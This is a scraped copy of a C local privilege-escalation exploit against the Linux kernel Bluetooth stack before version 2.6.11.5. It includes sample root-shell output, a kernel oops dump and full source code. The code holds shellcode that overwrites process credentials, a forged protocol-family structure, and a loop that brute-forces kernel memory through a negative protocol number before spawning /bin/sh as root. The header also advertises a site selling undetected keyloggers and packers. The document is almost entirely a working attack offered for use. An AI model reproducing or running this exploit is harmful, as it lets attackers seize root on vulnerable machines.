Linux Kernel < 2.6.11.5 BLUETOOTH Stack Local Root Exploit

                                                /*&nbsp;LINUX&nbsp;KERNEL&nbsp;<&nbsp;2.6.11.5&nbsp;BLUETOOTH&nbsp;STACK&nbsp;LOCAL&nbsp;ROOT&nbsp;EXPLOIT
*
*&nbsp;19&nbsp;October&nbsp;2005

http://backdoored.net
Visit&nbsp;us&nbsp;for&nbsp;Undetected&nbsp;keyloggers&nbsp;and&nbsp;packers.Thanx


h4x0r&nbsp;bluetooth&nbsp;$&nbsp;id
uid=1000(addicted)&nbsp;gid=100(users)&nbsp;groups=100(users)
h4x0r&nbsp;bluetooth&nbsp;$&nbsp;

h4x0r&nbsp;bluetooth&nbsp;$&nbsp;./backdoored-bluetooth&nbsp;
KERNEL&nbsp;Oops.&nbsp;Exit&nbsp;Code&nbsp;=&nbsp;11.(Segmentation&nbsp;fault)
KERNEL&nbsp;Oops.&nbsp;Exit&nbsp;Code&nbsp;=&nbsp;11.(Segmentation&nbsp;fault)
KERNEL&nbsp;Oops.&nbsp;Exit&nbsp;Code&nbsp;=&nbsp;11.(Segmentation&nbsp;fault)
KERNEL&nbsp;Oops.&nbsp;Exit&nbsp;Code&nbsp;=&nbsp;11.(Segmentation&nbsp;fault)
KERNEL&nbsp;Oops.&nbsp;Exit&nbsp;Code&nbsp;=&nbsp;11.(Segmentation&nbsp;fault)
Checking&nbsp;the&nbsp;Effective&nbsp;user&nbsp;id&nbsp;after&nbsp;overflow&nbsp;:&nbsp;UID&nbsp;=&nbsp;0
h4x0r&nbsp;bluetooth&nbsp;#&nbsp;id
uid=0(root)&nbsp;gid=0(root)&nbsp;groups=100(users)
h4x0r&nbsp;bluetooth&nbsp;#&nbsp;

h4x0r&nbsp;bluetooth&nbsp;#&nbsp;dmesg
PREEMPT&nbsp;SMP&nbsp;
Modules&nbsp;linked&nbsp;in:
CPU:&nbsp;&nbsp;&nbsp;&nbsp;0
EIP:&nbsp;&nbsp;&nbsp;&nbsp;0060:[<c0405ead>]&nbsp;&nbsp;&nbsp;&nbsp;Not&nbsp;tainted&nbsp;VLI
EFLAGS:&nbsp;00010286&nbsp;&nbsp;&nbsp;(2.6.9)&nbsp;
EIP&nbsp;is&nbsp;at&nbsp;bt_sock_create+0x3d/0x130
eax:&nbsp;ffffffff&nbsp;&nbsp;&nbsp;ebx:&nbsp;ffebfe34&nbsp;&nbsp;&nbsp;ecx:&nbsp;00000000&nbsp;&nbsp;&nbsp;edx:&nbsp;c051bea0
esi:&nbsp;ffffffa3&nbsp;&nbsp;&nbsp;edi:&nbsp;ffffff9f&nbsp;&nbsp;&nbsp;ebp:&nbsp;00000001&nbsp;&nbsp;&nbsp;esp:&nbsp;c6729f1c
ds:&nbsp;007b&nbsp;&nbsp;&nbsp;es:&nbsp;007b&nbsp;&nbsp;&nbsp;ss:&nbsp;0068
Process&nbsp;backdoored-bluetooth&nbsp;(pid:&nbsp;8809,&nbsp;threadinfo=c6729000&nbsp;task=c6728a20)
Stack:&nbsp;cef24e00&nbsp;0000001f&nbsp;0000001f&nbsp;c6581680&nbsp;ffffff9f&nbsp;c039a3bb&nbsp;c6581680&nbsp;ffebfe34&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;00000001&nbsp;b8000c80&nbsp;bffff944&nbsp;c6729000&nbsp;c039a58d&nbsp;0000001f&nbsp;00000003&nbsp;ffebfe34&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;c6729f78&nbsp;00000000&nbsp;c039a60b&nbsp;0000001f&nbsp;00000003&nbsp;ffebfe34&nbsp;c6729f78&nbsp;b8000c80&nbsp;
Call&nbsp;Trace:
&nbsp;[<c039a3bb>]&nbsp;__sock_create+0xfb/0x2a0
&nbsp;[<c039a58d>]&nbsp;sock_create+0x2d/0x40
&nbsp;[<c039a60b>]&nbsp;sys_socket+0x2b/0x60
&nbsp;[<c039b4e8>]&nbsp;sys_socketcall+0x68/0x260
&nbsp;[<c0117a9c>]&nbsp;finish_task_switch+0x3c/0x90
&nbsp;[<c0117b07>]&nbsp;schedule_tail+0x17/0x50
&nbsp;[<c0115410>]&nbsp;do_page_fault+0x0/0x5e9
&nbsp;[<c01031af>]&nbsp;syscall_call+0x7/0xb
Code:&nbsp;24&nbsp;0c&nbsp;89&nbsp;7c&nbsp;24&nbsp;10&nbsp;83&nbsp;fb&nbsp;07&nbsp;0f&nbsp;8f&nbsp;b1&nbsp;00&nbsp;00&nbsp;00&nbsp;8b&nbsp;04&nbsp;9d&nbsp;60&nbsp;a4&nbsp;5d&nbsp;c0&nbsp;85&nbsp;c0&nbsp;0f&nbsp;84&nbsp;d7&nbsp;00&nbsp;00&nbsp;00&nbsp;85&nbsp;c0&nbsp;be&nbsp;a3&nbsp;ff&nbsp;ff&nbsp;ff&nbsp;0f&nbsp;84&nbsp;93&nbsp;00&nbsp;00&nbsp;00&nbsp;<8b>&nbsp;50&nbsp;10&nbsp;bf&nbsp;01&nbsp;00&nbsp;00&nbsp;00&nbsp;
85&nbsp;d2&nbsp;74&nbsp;37&nbsp;b8&nbsp;00&nbsp;f0&nbsp;ff&nbsp;ff&nbsp;21&nbsp;e0&nbsp;ff&nbsp;40&nbsp;

*/


#include&nbsp;<stdio.h>
#include&nbsp;<stdlib.h>
#include&nbsp;<sys/socket.h>
#include&nbsp;<arpa/inet.h>
#include&nbsp;<sys/types.h>
#include&nbsp;<unistd.h>
#include&nbsp;<limits.h>
#include&nbsp;<signal.h>
#include&nbsp;<sys/wait.h>

#define&nbsp;KERNEL_SPACE_MEMORY_BRUTE_START&nbsp;0xc0000000
#define&nbsp;KERNEL_SPACE_MEMORY_BRUTE_END&nbsp;&nbsp;&nbsp;0xffffffff
#define&nbsp;KERNEL_SPACE_BUFFER&nbsp;0x100000


char&nbsp;asmcode[]&nbsp;=&nbsp;/*Global&nbsp;shellcode*/

\"\\xb8\\x00\\xf0\\xff\\xff\\x31\\xc9\\x21\\xe0\\x8b\\x10\\x89\\x8a\"
\"\\x80\\x01\\x00\\x00\\x31\\xc9\\x89\\x8a\\x7c\\x01\\x00\\x00\\x8b\"
\"\\x00\\x31\\xc9\\x31\\xd2\\x89\\x88\\x90\\x01\\x00\\x00\\x89\\x90\"
\"\\x8c\\x01\\x00\\x00\\xb8\\xff\\xff\\xff\\xff\\xc3\";



struct&nbsp;net_proto_family&nbsp;{
&nbsp;int&nbsp;family;
&nbsp;int&nbsp;(*create)&nbsp;(int&nbsp;*sock,&nbsp;int&nbsp;protocol);
&nbsp;short&nbsp;authentication;
&nbsp;short&nbsp;encryption;
&nbsp;short&nbsp;encrypt_net;
&nbsp;int&nbsp;&nbsp;&nbsp;*owner;
&nbsp;};


int&nbsp;check_zombie_child(int&nbsp;status,pid_t&nbsp;pid)
{
&nbsp;waitpid(pid,&status,0);
&nbsp;if(WIFEXITED(status))
&nbsp;&nbsp;{
&nbsp;&nbsp;if(WEXITSTATUS(status)&nbsp;!=&nbsp;0xFF)
&nbsp;&nbsp;&nbsp;exit(-1);&nbsp;&nbsp;
&nbsp;&nbsp;}
&nbsp;&nbsp;else&nbsp;if&nbsp;(WIFSIGNALED(status))
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf(\"KERNEL&nbsp;Oops.&nbsp;Exit&nbsp;Code&nbsp;=&nbsp;%d.(%s)\\n\",WTERMSIG(status),strsignal(WTERMSIG(status)));
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return(WTERMSIG(status));
&nbsp;&nbsp;&nbsp;&nbsp;}
}


int&nbsp;brute_socket_create&nbsp;(int&nbsp;negative_proto_number)
{
&nbsp;socket(AF_BLUETOOTH,SOCK_RAW,&nbsp;negative_proto_number);&nbsp;/*&nbsp;overflowing&nbsp;proto&nbsp;number&nbsp;with&nbsp;negative&nbsp;32bit&nbsp;value&nbsp;*/
&nbsp;int&nbsp;i;
&nbsp;i&nbsp;=&nbsp;geteuid();
&nbsp;printf(\"Checking&nbsp;the&nbsp;Effective&nbsp;user&nbsp;id&nbsp;after&nbsp;overflow&nbsp;:&nbsp;UID&nbsp;=&nbsp;%d\\n\",i);
if(i)
exit(EXIT_FAILURE);
&nbsp;printf(\"0wnage&nbsp;D0ne&nbsp;bro.\\n\");
&nbsp;execl(\"/bin/sh\",\"sh\",NULL);
&nbsp;exit(EXIT_SUCCESS);
}


int&nbsp;main(void)
{

pid_t&nbsp;pid;
int&nbsp;counter;
int&nbsp;status;
int&nbsp;*kernel_return;

char&nbsp;kernel_buffer[KERNEL_SPACE_BUFFER];
unsigned&nbsp;int&nbsp;brute_start;
unsigned&nbsp;int&nbsp;where_kernel;

struct&nbsp;net_proto_family&nbsp;*bluetooth;

bluetooth&nbsp;=&nbsp;(struct&nbsp;net_proto_family&nbsp;*)&nbsp;malloc(sizeof(struct&nbsp;net_proto_family));
bzero(bluetooth,sizeof(struct&nbsp;net_proto_family));

bluetooth->family&nbsp;=&nbsp;AF_BLUETOOTH;
bluetooth->authentication&nbsp;=&nbsp;0x0;&nbsp;&nbsp;/*&nbsp;No&nbsp;Authentication&nbsp;*/
bluetooth->encryption&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;0x0;&nbsp;/*&nbsp;No&nbsp;Encryption&nbsp;*/
bluetooth->encrypt_net&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;0x0;&nbsp;&nbsp;/*&nbsp;No&nbsp;Encrypt_net&nbsp;*/
bluetooth->owner&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;0x0;&nbsp;&nbsp;/*&nbsp;No&nbsp;fucking&nbsp;owner&nbsp;&nbsp;&nbsp;*/
bluetooth->create&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;(int&nbsp;*)&nbsp;asmcode;



kernel_return&nbsp;=&nbsp;(int&nbsp;*)&nbsp;kernel_buffer;

for(&nbsp;counter&nbsp;=&nbsp;0;&nbsp;counter&nbsp;<&nbsp;KERNEL_SPACE_BUFFER;&nbsp;counter+=4,&nbsp;kernel_return++)
&nbsp;&nbsp;&nbsp;*kernel_return&nbsp;=&nbsp;(int)bluetooth;

brute_start&nbsp;=&nbsp;&nbsp;KERNEL_SPACE_MEMORY_BRUTE_START;
printf(\"Bluetooth&nbsp;stack&nbsp;local&nbsp;root&nbsp;exploit\\n\");
printf(\"http://backdoored/net\");

while&nbsp;(&nbsp;brute_start&nbsp;<&nbsp;KERNEL_SPACE_MEMORY_BRUTE_END&nbsp;)
&nbsp;{
&nbsp;&nbsp;&nbsp;where_kernel&nbsp;=&nbsp;(brute_start&nbsp;-&nbsp;(unsigned&nbsp;int)&kernel_buffer)&nbsp;/&nbsp;0x4&nbsp;;
&nbsp;&nbsp;&nbsp;where_kernel&nbsp;=&nbsp;-where_kernel;

&nbsp;&nbsp;&nbsp;pid&nbsp;=&nbsp;fork();
&nbsp;&nbsp;&nbsp;if(pid&nbsp;==&nbsp;0&nbsp;)
&nbsp;&nbsp;&nbsp;brute_socket_create(where_kernel);
&nbsp;&nbsp;&nbsp;check_zombie_child(status,pid);
&nbsp;&nbsp;&nbsp;brute_start&nbsp;+=&nbsp;KERNEL_SPACE_BUFFER;
&nbsp;&nbsp;&nbsp;fflush(stdout);
}
return&nbsp;0;
}